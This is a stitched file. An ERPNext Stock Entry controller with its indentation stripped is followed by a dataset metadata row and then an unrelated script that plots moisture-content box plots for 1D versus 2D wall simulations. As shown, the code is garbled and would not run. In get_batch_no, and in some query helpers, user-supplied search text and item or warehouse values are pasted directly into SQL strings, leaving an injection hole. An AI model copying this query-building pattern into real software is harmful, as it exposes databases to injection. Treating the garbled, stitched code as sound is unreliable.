else:
return
if self.purpose == "Manufacture/Repack":
# check for double entry
self.check_duplicate_entry_for_production_order()
elif self.purpose != "Material Transfer":
self.production_order = None
def check_duplicate_entry_for_production_order(self):
other_ste = [t[0] for t in frappe.db.get_values("Stock Entry", {
"production_order": self.production_order,
"purpose": self.purpose,
"docstatus": ["!=", 2],
"name": ["!=", self.name]
}, "name")]
if other_ste:
production_item, qty = frappe.db.get_value("Production Order",
self.production_order, ["production_item", "qty"])
args = other_ste + [production_item]
fg_qty_already_entered = frappe.db.sql("""select sum(transfer_qty)
from `tabStock Entry Detail`
where parent in (%s)
and item_code = %s
			and ifnull(s_warehouse,'')='' """ % (", ".join(["%s"] * len(other_ste)), "%s"), args)[0][0]
if fg_qty_already_entered >= qty:
frappe.throw(_("Stock Entries already created for Production Order ")
+ self.production_order + ":" + ", ".join(other_ste), DuplicateEntryForProductionOrderError)
def validate_valuation_rate(self):
if self.purpose == "Manufacture/Repack":
valuation_at_source, valuation_at_target = 0, 0
for d in self.get("mtn_details"):
if d.s_warehouse and not d.t_warehouse:
valuation_at_source += flt(d.amount)
if d.t_warehouse and not d.s_warehouse:
valuation_at_target += flt(d.amount)
if valuation_at_target < valuation_at_source:
frappe.throw(_("Total valuation for manufactured or repacked item(s) can not be less than total valuation of raw materials"))
def set_total_amount(self):
self.total_amount = sum([flt(item.amount) for item in self.get("mtn_details")])
def get_stock_and_rate(self, force=False):
"""get stock and incoming rate on posting date"""
raw_material_cost = 0.0
if not self.posting_date or not self.posting_time:
frappe.throw(_("Posting date and posting time is mandatory"))
allow_negative_stock = cint(frappe.db.get_default("allow_negative_stock"))
for d in self.get('mtn_details'):
args = frappe._dict({
"item_code": d.item_code,
"warehouse": d.s_warehouse or d.t_warehouse,
"posting_date": self.posting_date,
"posting_time": self.posting_time,
"qty": d.s_warehouse and -1*d.transfer_qty or d.transfer_qty,
"serial_no": d.serial_no
})
# get actual stock at source warehouse
d.actual_qty = get_previous_sle(args).get("qty_after_transaction") or 0
# validate qty during submit
if d.docstatus==1 and d.s_warehouse and not allow_negative_stock and d.actual_qty < d.transfer_qty:
frappe.throw(_("""Row {0}: Qty not avalable in warehouse {1} on {2} {3}.
Available Qty: {4}, Transfer Qty: {5}""").format(d.idx, d.s_warehouse,
self.posting_date, self.posting_time, d.actual_qty, d.transfer_qty))
# get incoming rate
if not d.bom_no:
if not flt(d.incoming_rate) or d.s_warehouse or self.purpose == "Sales Return" or force:
incoming_rate = flt(self.get_incoming_rate(args), self.precision("incoming_rate", d))
if incoming_rate > 0:
d.incoming_rate = incoming_rate
d.amount = flt(d.transfer_qty) * flt(d.incoming_rate)
if not d.t_warehouse:
raw_material_cost += flt(d.amount)
# set incoming rate for fg item
if self.purpose == "Manufacture/Repack":
number_of_fg_items = len([t.t_warehouse for t in self.get("mtn_details") if t.t_warehouse])
for d in self.get("mtn_details"):
if d.bom_no or (d.t_warehouse and number_of_fg_items == 1):
if not flt(d.incoming_rate) or force:
operation_cost_per_unit = 0
if d.bom_no:
bom = frappe.db.get_value("BOM", d.bom_no, ["operating_cost", "quantity"], as_dict=1)
operation_cost_per_unit = flt(bom.operating_cost) / flt(bom.quantity)
d.incoming_rate = operation_cost_per_unit + (raw_material_cost / flt(d.transfer_qty))
d.amount = flt(d.transfer_qty) * flt(d.incoming_rate)
break
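	# Worked example for the finished-goods rate above (hypothetical figures):
	# with raw_material_cost=500, a BOM having operating_cost=100 for
	# quantity=10 (i.e. 10 per unit) and a row with transfer_qty=5, we get
	# incoming_rate = 10 + 500/5 = 110 and amount = 5 * 110 = 550.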
def get_incoming_rate(self, args):
incoming_rate = 0
if self.purpose == "Sales Return":
incoming_rate = self.get_incoming_rate_for_sales_return(args)
else:
incoming_rate = get_incoming_rate(args)
return incoming_rate
def get_incoming_rate_for_sales_return(self, args):
incoming_rate = 0.0
if (self.delivery_note_no or self.sales_invoice_no) and args.get("item_code"):
incoming_rate = frappe.db.sql("""select abs(ifnull(stock_value_difference, 0) / actual_qty)
from `tabStock Ledger Entry`
where voucher_type = %s and voucher_no = %s and item_code = %s limit 1""",
((self.delivery_note_no and "Delivery Note" or "Sales Invoice"),
self.delivery_note_no or self.sales_invoice_no, args.item_code))
incoming_rate = incoming_rate[0][0] if incoming_rate else 0.0
return incoming_rate
def validate_incoming_rate(self):
for d in self.get('mtn_details'):
if d.t_warehouse:
self.validate_value("incoming_rate", ">", 0, d, raise_exception=IncorrectValuationRateError)
def validate_bom(self):
for d in self.get('mtn_details'):
if d.bom_no and not frappe.db.sql("""select name from `tabBOM`
where item = %s and name = %s and docstatus = 1 and is_active = 1""",
(d.item_code, d.bom_no)):
frappe.throw(_("BOM {0} is not submitted or inactive BOM for Item {1}").format(d.bom_no, d.item_code))
def validate_finished_goods(self):
"""validation: finished good quantity should be same as manufacturing quantity"""
for d in self.get('mtn_details'):
if d.bom_no and flt(d.transfer_qty) != flt(self.fg_completed_qty):
frappe.throw(_("Quantity in row {0} ({1}) must be same as manufactured quantity {2}").format(d.idx, d.transfer_qty, self.fg_completed_qty))
def validate_return_reference_doc(self):
"""validate item with reference doc"""
ref = get_return_doc_and_details(self)
if ref.doc:
# validate docstatus
if ref.doc.docstatus != 1:
frappe.throw(_("{0} {1} must be submitted").format(ref.doc.doctype, ref.doc.name),
frappe.InvalidStatusError)
# update stock check
if ref.doc.doctype == "Sales Invoice" and cint(ref.doc.update_stock) != 1:
frappe.throw(_("'Update Stock' for Sales Invoice {0} must be set").format(ref.doc.name), NotUpdateStockError)
# posting date check
ref_posting_datetime = "%s %s" % (cstr(ref.doc.posting_date),
cstr(ref.doc.posting_time) or "00:00:00")
this_posting_datetime = "%s %s" % (cstr(self.posting_date),
cstr(self.posting_time))
if this_posting_datetime < ref_posting_datetime:
from frappe.utils.dateutils import datetime_in_user_format
frappe.throw(_("Posting timestamp must be after {0}").format(datetime_in_user_format(ref_posting_datetime)))
stock_items = get_stock_items_for_return(ref.doc, ref.parentfields)
already_returned_item_qty = self.get_already_returned_item_qty(ref.fieldname)
for item in self.get("mtn_details"):
# validate if item exists in the ref doc and that it is a stock item
if item.item_code not in stock_items:
frappe.throw(_("Item {0} does not exist in {1} {2}").format(item.item_code, ref.doc.doctype, ref.doc.name),
frappe.DoesNotExistError)
# validate quantity <= ref item's qty - qty already returned
if self.purpose == "Purchase Return":
ref_item_qty = sum([flt(d.qty)*flt(d.conversion_factor) for d in ref.doc.get({"item_code": item.item_code})])
elif self.purpose == "Sales Return":
ref_item_qty = sum([flt(d.qty) for d in ref.doc.get({"item_code": item.item_code})])
returnable_qty = ref_item_qty - flt(already_returned_item_qty.get(item.item_code))
if not returnable_qty:
frappe.throw(_("Item {0} has already been returned").format(item.item_code), StockOverReturnError)
elif item.transfer_qty > returnable_qty:
frappe.throw(_("Cannot return more than {0} for Item {1}").format(returnable_qty, item.item_code),
StockOverReturnError)
def get_already_returned_item_qty(self, ref_fieldname):
return dict(frappe.db.sql("""select item_code, sum(transfer_qty) as qty
from `tabStock Entry Detail` where parent in (
select name from `tabStock Entry` where `%s`=%s and docstatus=1)
group by item_code""" % (ref_fieldname, "%s"), (self.get(ref_fieldname),)))
def update_stock_ledger(self):
sl_entries = []
for d in self.get('mtn_details'):
if cstr(d.s_warehouse) and self.docstatus == 1:
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.s_warehouse),
"actual_qty": -flt(d.transfer_qty),
"incoming_rate": 0
}))
if cstr(d.t_warehouse):
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.t_warehouse),
"actual_qty": flt(d.transfer_qty),
"incoming_rate": flt(d.incoming_rate)
}))
# On cancellation, make stock ledger entry for
# target warehouse first, to update serial no values properly
if cstr(d.s_warehouse) and self.docstatus == 2:
sl_entries.append(self.get_sl_entries(d, {
"warehouse": cstr(d.s_warehouse),
"actual_qty": -flt(d.transfer_qty),
"incoming_rate": 0
}))
self.make_sl_entries(sl_entries, self.amended_from and 'Yes' or 'No')
def update_production_order(self):
def _validate_production_order(pro_doc):
if flt(pro_doc.docstatus) != 1:
frappe.throw(_("Production Order {0} must be submitted").format(self.production_order))
if pro_doc.status == 'Stopped':
frappe.throw(_("Transaction not allowed against stopped Production Order {0}").format(self.production_order))
if self.production_order:
pro_doc = frappe.get_doc("Production Order", self.production_order)
_validate_production_order(pro_doc)
pro_doc.run_method("update_status")
if self.purpose == "Manufacture/Repack":
pro_doc.run_method("update_produced_qty")
self.update_planned_qty(pro_doc)
def update_planned_qty(self, pro_doc):
from erpnext.stock.utils import update_bin
update_bin({
"item_code": pro_doc.production_item,
"warehouse": pro_doc.fg_warehouse,
"posting_date": self.posting_date,
"planned_qty": (self.docstatus==1 and -1 or 1 ) * flt(self.fg_completed_qty)
})
def get_item_details(self, args):
item = frappe.db.sql("""select stock_uom, description, item_name,
expense_account, buying_cost_center from `tabItem`
where name = %s and (ifnull(end_of_life,'0000-00-00')='0000-00-00' or end_of_life > now())""",
(args.get('item_code')), as_dict = 1)
if not item:
frappe.throw(_("Item {0} is not active or end of life has been reached").format(args.get("item_code")))
ret = {
'uom' : item and item[0]['stock_uom'] or '',
'stock_uom' : item and item[0]['stock_uom'] or '',
'description' : item and item[0]['description'] or '',
'item_name' : item and item[0]['item_name'] or '',
'expense_account' : args.get("expense_account") \
or frappe.db.get_value("Company", args.get("company"), "stock_adjustment_account"),
'cost_center' : item and item[0]['buying_cost_center'] or args.get("cost_center"),
'qty' : 0,
'transfer_qty' : 0,
'conversion_factor' : 1,
'batch_no' : '',
'actual_qty' : 0,
'incoming_rate' : 0
}
stock_and_rate = args.get('warehouse') and self.get_warehouse_details(args) or {}
ret.update(stock_and_rate)
return ret
def get_uom_details(self, args):
conversion_factor = frappe.db.get_value("UOM Conversion Detail", {"parent": args.get("item_code"),
"uom": args.get("uom")}, "conversion_factor")
if not conversion_factor:
frappe.msgprint(_("UOM coversion factor required for UOM: {0} in Item: {1}")
.format(args.get("uom"), args.get("item_code")))
ret = {'uom' : ''}
else:
ret = {
'conversion_factor' : flt(conversion_factor),
'transfer_qty' : flt(args.get("qty")) * flt(conversion_factor)
}
return ret
def get_warehouse_details(self, args):
ret = {}
if args.get('warehouse') and args.get('item_code'):
args.update({
"posting_date": self.posting_date,
"posting_time": self.posting_time,
})
args = frappe._dict(args)
ret = {
"actual_qty" : get_previous_sle(args).get("qty_after_transaction") or 0,
"incoming_rate" : self.get_incoming_rate(args)
}
return ret
def get_items(self):
self.set('mtn_details', [])
pro_obj = None
if self.production_order:
# common validations
pro_obj = frappe.get_doc('Production Order', self.production_order)
if pro_obj:
self.validate_production_order(pro_obj)
self.bom_no = pro_obj.bom_no
else:
# invalid production order
self.production_order = None
if self.bom_no:
if self.purpose in ["Material Issue", "Material Transfer", "Manufacture/Repack",
"Subcontract"]:
if self.production_order and self.purpose == "Material Transfer":
item_dict = self.get_pending_raw_materials(pro_obj)
else:
if not self.fg_completed_qty:
frappe.throw(_("Manufacturing Quantity is mandatory"))
item_dict = self.get_bom_raw_materials(self.fg_completed_qty)
for item in item_dict.values():
if pro_obj:
item["from_warehouse"] = pro_obj.wip_warehouse
item["to_warehouse"] = ""
# add raw materials to Stock Entry Detail table
self.add_to_stock_entry_detail(item_dict)
# add finished good item to Stock Entry Detail table -- along with bom_no
if self.production_order and self.purpose == "Manufacture/Repack":
item = frappe.db.get_value("Item", pro_obj.production_item, ["item_name",
"description", "stock_uom", "expense_account", "buying_cost_center"], as_dict=1)
self.add_to_stock_entry_detail({
cstr(pro_obj.production_item): {
"to_warehouse": pro_obj.fg_warehouse,
"from_warehouse": "",
"qty": self.fg_completed_qty,
"item_name": item.item_name,
"description": item.description,
"stock_uom": item.stock_uom,
"expense_account": item.expense_account,
"cost_center": item.buying_cost_center,
}
}, bom_no=pro_obj.bom_no)
elif self.purpose in ["Material Receipt", "Manufacture/Repack"]:
if self.purpose=="Material Receipt":
self.from_warehouse = ""
item = frappe.db.sql("""select name, item_name, description,
stock_uom, expense_account, buying_cost_center from `tabItem`
where name=(select item from tabBOM where name=%s)""",
self.bom_no, as_dict=1)
self.add_to_stock_entry_detail({
item[0]["name"] : {
"qty": self.fg_completed_qty,
"item_name": item[0].item_name,
"description": item[0]["description"],
"stock_uom": item[0]["stock_uom"],
"from_warehouse": "",
"expense_account": item[0].expense_account,
"cost_center": item[0].buying_cost_center,
}
}, bom_no=self.bom_no)
self.get_stock_and_rate()
def get_bom_raw_materials(self, qty):
from erpnext.manufacturing.doctype.bom.bom import get_bom_items_as_dict
# item dict = { item_code: {qty, description, stock_uom} }
item_dict = get_bom_items_as_dict(self.bom_no, qty=qty, fetch_exploded = self.use_multi_level_bom)
for item in item_dict.values():
item.from_warehouse = item.default_warehouse
return item_dict
def get_pending_raw_materials(self, pro_obj):
"""
		issue the item quantity that is pending to be issued or the quantity
		desired to be transferred, whichever is less
"""
item_dict = self.get_bom_raw_materials(1)
issued_item_qty = self.get_issued_qty()
max_qty = flt(pro_obj.qty)
only_pending_fetched = []
for item in item_dict:
pending_to_issue = (max_qty * item_dict[item]["qty"]) - issued_item_qty.get(item, 0)
desire_to_transfer = flt(self.fg_completed_qty) * item_dict[item]["qty"]
if desire_to_transfer <= pending_to_issue:
item_dict[item]["qty"] = desire_to_transfer
else:
item_dict[item]["qty"] = pending_to_issue
if pending_to_issue:
only_pending_fetched.append(item)
# delete items with 0 qty
for item in item_dict.keys():
if not item_dict[item]["qty"]:
del item_dict[item]
# show some message
if not len(item_dict):
frappe.msgprint(_("""All items have already been transferred for this Production Order."""))
elif only_pending_fetched:
frappe.msgprint(_("Pending Items {0} updated").format(only_pending_fetched))
return item_dict
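	# Worked example for get_pending_raw_materials (hypothetical figures):
	# if the BOM needs 2 units of an item per finished good, pro_obj.qty=10
	# and 6 units were already issued, then pending_to_issue = 10*2 - 6 = 14;
	# with fg_completed_qty=5 the desired transfer is 5*2 = 10 <= 14, so the
	# item is fetched with qty 10.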
def get_issued_qty(self):
issued_item_qty = {}
result = frappe.db.sql("""select t1.item_code, sum(t1.qty)
from `tabStock Entry Detail` t1, `tabStock Entry` t2
where t1.parent = t2.name and t2.production_order = %s and t2.docstatus = 1
and t2.purpose = 'Material Transfer'
group by t1.item_code""", self.production_order)
for t in result:
issued_item_qty[t[0]] = flt(t[1])
return issued_item_qty
def add_to_stock_entry_detail(self, item_dict, bom_no=None):
expense_account, cost_center = frappe.db.get_values("Company", self.company, \
["default_expense_account", "cost_center"])[0]
for d in item_dict:
se_child = self.append('mtn_details')
se_child.s_warehouse = item_dict[d].get("from_warehouse", self.from_warehouse)
se_child.t_warehouse = item_dict[d].get("to_warehouse", self.to_warehouse)
se_child.item_code = cstr(d)
se_child.item_name = item_dict[d]["item_name"]
se_child.description = item_dict[d]["description"]
se_child.uom = item_dict[d]["stock_uom"]
se_child.stock_uom = item_dict[d]["stock_uom"]
se_child.qty = flt(item_dict[d]["qty"])
se_child.expense_account = item_dict[d]["expense_account"] or expense_account
se_child.cost_center = item_dict[d]["cost_center"] or cost_center
# in stock uom
se_child.transfer_qty = flt(item_dict[d]["qty"])
se_child.conversion_factor = 1.00
# to be assigned for finished item
se_child.bom_no = bom_no
def validate_with_material_request(self):
for item in self.get("mtn_details"):
if item.material_request:
mreq_item = frappe.db.get_value("Material Request Item",
{"name": item.material_request_item, "parent": item.material_request},
["item_code", "warehouse", "idx"], as_dict=True)
if mreq_item.item_code != item.item_code or mreq_item.warehouse != item.t_warehouse:
frappe.throw(_("Item or Warehouse for row {0} does not match Material Request").format(item.idx),
frappe.MappingMismatchError)
def get_work_orderDetails(self, work_order):
		WO_details = frappe.db.get_value('Work Order', work_order, '*', as_dict=1)
if WO_details:
return {
'sales_invoice_no' : WO_details.sales_invoice_no,
'customer_name' : WO_details.customer_name,
'trial_date' : WO_details.trial_date,
'delivery_date' : WO_details.delivery_date,
'trials' : WO_details.trial_no
}
else:
return None
@frappe.whitelist()
def get_party_details(ref_dt, ref_dn):
if ref_dt in ["Delivery Note", "Sales Invoice"]:
res = frappe.db.get_value(ref_dt, ref_dn,
["customer", "customer_name", "address_display as customer_address"], as_dict=1)
else:
res = frappe.db.get_value(ref_dt, ref_dn,
["supplier", "supplier_name", "address_display as supplier_address"], as_dict=1)
return res or {}
@frappe.whitelist()
def get_production_order_details(production_order):
result = frappe.db.sql("""select bom_no,
ifnull(qty, 0) - ifnull(produced_qty, 0) as fg_completed_qty, use_multi_level_bom,
wip_warehouse from `tabProduction Order` where name = %s""", production_order, as_dict=1)
return result and result[0] or {}
def query_sales_return_doc(doctype, txt, searchfield, start, page_len, filters):
conditions = ""
if doctype == "Sales Invoice":
conditions = "and update_stock=1"
return frappe.db.sql("""select name, customer, customer_name
from `tab%s` where docstatus = 1
and (`%s` like %%(txt)s
or `customer` like %%(txt)s) %s %s
order by name, customer, customer_name
limit %s""" % (doctype, searchfield, conditions,
get_match_cond(doctype), "%(start)s, %(page_len)s"),
{"txt": "%%%s%%" % txt, "start": start, "page_len": page_len},
as_list=True)
def query_purchase_return_doc(doctype, txt, searchfield, start, page_len, filters):
return frappe.db.sql("""select name, supplier, supplier_name
from `tab%s` where docstatus = 1
and (`%s` like %%(txt)s
or `supplier` like %%(txt)s) %s
order by name, supplier, supplier_name
limit %s""" % (doctype, searchfield, get_match_cond(doctype),
"%(start)s, %(page_len)s"), {"txt": "%%%s%%" % txt, "start":
start, "page_len": page_len}, as_list=True)
def query_return_item(doctype, txt, searchfield, start, page_len, filters):
txt = txt.replace("%", "")
ref = get_return_doc_and_details(filters)
stock_items = get_stock_items_for_return(ref.doc, ref.parentfields)
result = []
for item in ref.doc.get_all_children():
if getattr(item, "item_code", None) in stock_items:
item.item_name = cstr(item.item_name)
item.description = cstr(item.description)
if (txt in item.item_code) or (txt in item.item_name) or (txt in item.description):
val = [
item.item_code,
(len(item.item_name) > 40) and (item.item_name[:40] + "...") or item.item_name,
(len(item.description) > 40) and (item.description[:40] + "...") or \
item.description
]
if val not in result:
result.append(val)
return result[start:start+page_len]
def get_batch_no(doctype, txt, searchfield, start, page_len, filters):
if not filters.get("posting_date"):
filters["posting_date"] = nowdate()
batch_nos = None
args = {
'item_code': filters.get("item_code"),
's_warehouse': filters.get('s_warehouse'),
'posting_date': filters.get('posting_date'),
'txt': "%%%s%%" % txt,
'mcond':get_match_cond(doctype),
"start": start,
"page_len": page_len
}
if filters.get("s_warehouse"):
batch_nos = frappe.db.sql("""select batch_no
from `tabStock Ledger Entry` sle
where item_code = '%(item_code)s'
and warehouse = '%(s_warehouse)s'
and batch_no like '%(txt)s'
and exists(select * from `tabBatch`
where name = sle.batch_no
and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s
or expiry_date = '')
and docstatus != 2)
%(mcond)s
group by batch_no having sum(actual_qty) > 0
order by batch_no desc
limit %(start)s, %(page_len)s """
% args)
if batch_nos:
return batch_nos
else:
return frappe.db.sql("""select name from `tabBatch`
where item = '%(item_code)s'
and docstatus < 2
and (ifnull(expiry_date, '2099-12-31') >= %(posting_date)s
or expiry_date = '' or expiry_date = "0000-00-00")
%(mcond)s
order by name desc
limit %(start)s, %(page_len)s
""" % args)
def get_stock_items_for_return(ref_doc, parentfields):
"""return item codes filtered from doc, which are stock items"""
if isinstance(parentfields, basestring):
parentfields = [parentfields]
all_items = list(set([d.item_code for d in
ref_doc.get_all_children() if d.get("item_code")]))
stock_items = frappe.db.sql_list("""select name from `tabItem`
where is_stock_item='Yes' and name in (%s)""" % (", ".join(["%s"] * len(all_items))),
tuple(all_items))
return stock_items
def get_return_doc_and_details(args):
ref = frappe._dict()
# get ref_doc
if args.get("purpose") in return_map:
for fieldname, val in return_map[args.get("purpose")].items():
if args.get(fieldname):
ref.fieldname = fieldname
ref.doc = frappe.get_doc(val[0], args.get(fieldname))
ref.parentfields = val[1]
break
return ref
return_map = {
"Sales Return": {
# [Ref DocType, [Item tables' parentfields]]
"delivery_note_no": ["Delivery Note", ["delivery_note_details", "packing_details"]],
"sales_invoice_no": ["Sales Invoice", ["entries", "packing_details"]]
},
"Purchase Return": {
"purchase_receipt_no": ["Purchase Receipt", ["purchase_receipt_details"]]
}
}
@frappe.whitelist()
def make_return_jv(stock_entry):
se = frappe.get_doc("Stock Entry", stock_entry)
if not se.purpose in ["Sales Return", "Purchase Return"]:
return
ref = get_return_doc_and_details(se)
if ref.doc.doctype == "Delivery Note":
result = make_return_jv_from_delivery_note(se, ref)
elif ref.doc.doctype == "Sales Invoice":
result = make_return_jv_from_sales_invoice(se, ref)
elif ref.doc.doctype == "Purchase Receipt":
result = make_return_jv_from_purchase_receipt(se, ref)
# create jv doc and fetch balance for each unique row item
jv = frappe.new_doc("Journal Voucher")
jv.update({
"posting_date": se.posting_date,
"voucher_type": se.purpose == "Sales Return" and "Credit Note" or "Debit Note",
"fiscal_year": se.fiscal_year,
"company": se.company
})
from erpnext.accounts.utils import get_balance_on
for r in result:
jv.append("entries", {
"account": r.get("account"),
"against_invoice": r.get("against_invoice"),
"against_voucher": r.get("against_voucher"),
"balance": get_balance_on(r.get("account"), se.posting_date) if r.get("account") else 0
})
return jv
def make_return_jv_from_sales_invoice(se, ref):
# customer account entry
parent = {
"account": ref.doc.debit_to,
"against_invoice": ref.doc.name,
}
# income account entries
children = []
for se_item in se.get("mtn_details"):
# find item in ref.doc
ref_item = ref.doc.get({"item_code": se_item.item_code})[0]
account = get_sales_account_from_item(ref.doc, ref_item)
if account not in children:
children.append(account)
return [parent] + [{"account": account} for account in children]
def get_sales_account_from_item(doc, ref_item):
account = None
if not getattr(ref_item, "income_account", None):
if ref_item.parent_item:
parent_item = doc.get(doc.fname, {"item_code": ref_item.parent_item})[0]
account = parent_item.income_account
else:
account = ref_item.income_account
return account
def make_return_jv_from_delivery_note(se, ref):
invoices_against_delivery = get_invoice_list("Sales Invoice Item", "delivery_note",
ref.doc.name)
if not invoices_against_delivery:
sales_orders_against_delivery = [d.against_sales_order for d in ref.doc.get_all_children() if getattr(d, "against_sales_order", None)]
if sales_orders_against_delivery:
invoices_against_delivery = get_invoice_list("Sales Invoice Item", "sales_order",
sales_orders_against_delivery)
if not invoices_against_delivery:
return []
packing_item_parent_map = dict([[d.item_code, d.parent_item] for d in ref.doc.get(ref.parentfields[1])])
parent = {}
children = []
for se_item in se.get("mtn_details"):
for sales_invoice in invoices_against_delivery:
si = frappe.get_doc("Sales Invoice", sales_invoice)
if se_item.item_code in packing_item_parent_map:
ref_item = si.get({"item_code": packing_item_parent_map[se_item.item_code]})
else:
ref_item = si.get({"item_code": se_item.item_code})
if not ref_item:
continue
ref_item = ref_item[0]
account = get_sales_account_from_item(si, ref_item)
if account not in children:
children.append(account)
if not parent:
parent = {"account": si.debit_to}
break
if len(invoices_against_delivery) == 1:
parent["against_invoice"] = invoices_against_delivery[0]
result = [parent] + [{"account": account} for account in children]
return result
def get_invoice_list(doctype, link_field, value):
if isinstance(value, basestring):
value = [value]
return frappe.db.sql_list("""select distinct parent from `tab%s`
where docstatus = 1 and `%s` in (%s)""" % (doctype, link_field,
", ".join(["%s"]*len(value))), tuple(value))
def make_return_jv_from_purchase_receipt(se, ref):
invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_receipt",
ref.doc.name)
if not invoice_against_receipt:
purchase_orders_against_receipt = [d.prevdoc_docname for d in
ref.doc.get(ref.doc.fname, {"prevdoc_doctype": "Purchase Order"})
if getattr(d, "prevdoc_docname", None)]
if purchase_orders_against_receipt:
invoice_against_receipt = get_invoice_list("Purchase Invoice Item", "purchase_order",
purchase_orders_against_receipt)
if not invoice_against_receipt:
return []
parent = {}
children = []
for se_item in se.get("mtn_details"):
for purchase_invoice in invoice_against_receipt:
pi = frappe.get_doc("Purchase Invoice", purchase_invoice)
ref_item = pi.get({"item_code": se_item.item_code})
if not ref_item:
continue
ref_item = ref_item[0]
account = ref_item.expense_account
if account not in children:
children.append(account)
if not parent:
parent = {"account": pi.credit_to}
break
if len(invoice_against_receipt) == 1:
parent["against_voucher"] = invoice_against_receipt[0]
result = [parent] + [{"account": account} for account in children]
return result
|
agpl-3.0
| 3,160,072,189,511,768,600
| 35.210251
| 143
| 0.676546
| false
| 3.015681
| false
| false
| false
|
thp44/delphin_6_automation
|
data_process/2d_1d/archieve/moisture_content_comparison.py
|
1
|
18274
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
import pandas as pd
import matplotlib.pyplot as plt
# RiBuild Modules
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
out_folder = r'C:\Users\ocni\PycharmProjects\delphin_6_automation\data_process\2d_1d\processed_data'
graphic_folder = r'U:\RIBuild\2D_1D\Processed Results\4A'
hdf_file = out_folder + '/relative_moisture_content.h5'
# Open HDF
# Uninsulated
dresdenzp_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_uninsulated_4a')
dresdenzd_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_uninsulated_4a')
postdam_highratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_uninsulated_4a')
dresdenzp_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_uninsulated_4a')
dresdenzd_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_uninsulated_4a')
postdam_lowratio_uninsulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_uninsulated_4a')
total_uninsulated_4a = pd.concat([dresdenzp_highratio_uninsulated_4a, dresdenzd_highratio_uninsulated_4a,
postdam_highratio_uninsulated_4a, dresdenzp_lowratio_uninsulated_4a,
dresdenzd_lowratio_uninsulated_4a, postdam_lowratio_uninsulated_4a])
# Insulated
dresdenzp_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_high_ratio_insulated_4a')
dresdenzd_highratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_high_ratio_insulated_4a')
postdam_highratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_high_ratio_insulated_4a')
dresdenzp_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zp_low_ratio_insulated_4a')
dresdenzd_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'dresden_zd_low_ratio_insulated_4a')
postdam_lowratio_insulated_4a = pd.read_hdf(hdf_file, 'potsdam_low_ratio_insulated_4a')
total_insulated_4a = pd.concat([dresdenzp_highratio_insulated_4a, dresdenzd_highratio_insulated_4a,
postdam_highratio_insulated_4a, dresdenzp_lowratio_insulated_4a,
dresdenzd_lowratio_insulated_4a, postdam_lowratio_insulated_4a])
def plots(plot, save=False):
"""
Creates box plots from all the wall scenarios
"""
if plot == 'uninsulated' or plot == 'all':
plt.figure('dresdenzp_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_highratio_uninsulated_4a_moisture")
plt.figure('dresdenzd_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_highratio_uninsulated_4a_moisture")
plt.figure('postdam_highratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_highratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: High Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/postdam_highratio_uninsulated_4a_moisture")
plt.figure('dresdenzp_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzp_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZP - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzp_lowratio_uninsulated_4a_moisture")
plt.figure('dresdenzd_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
dresdenzd_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Dresden ZD - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/dresdenzd_lowratio_uninsulated_4a_moisture")
plt.figure('postdam_lowratio_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
postdam_lowratio_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
plt.ylabel('Relative Difference in %')
plt.title('Weighted Relative Difference between 1D and 2D\n'
'Moisture Content\n'
'Brick: Potsdam - Mortar: Low Cement Ratio - Insulation: None')
if save:
plt.savefig(f"{graphic_folder}/postdam_lowratio_uninsulated_4a_moisture")
plt.figure('total_uninsulated_4a_moisture', figsize=(16, 8), tight_layout=True)
total_uninsulated_4a.boxplot(showfliers=False)
plt.ylim(-5, 1100)
